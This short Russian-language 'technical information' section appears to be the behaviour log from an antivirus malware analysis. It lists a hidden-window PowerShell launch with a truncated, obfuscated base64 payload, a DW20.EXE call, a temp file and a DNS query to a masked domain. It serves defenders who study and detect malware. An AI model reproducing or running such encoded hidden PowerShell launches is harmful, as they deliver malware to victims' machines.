Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEEAUQA0AEEAQwBfAFEAIAA9ACAAJwA4ADcAMQAnADsAJABZAGsAVQBCAEIAbwA9ACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBoAEIAQgA0AFUAQgBBACcALAAnAHcAJwApADsAJABYAEIAYwBBAHcAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\1165935.cvr
- DNS ASK hi###eenan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEEAUQA0AEEAQwBfAFEAIAA9ACAAJwA4ADcAMQAnADsAJABZAGsAVQBCAEIAbwA9ACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBoAEIAQgA0AFUAQgBBACcALAAnAHcAJwApADsAJABYAEIAYwBBAHcAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...' (со скрытым окном)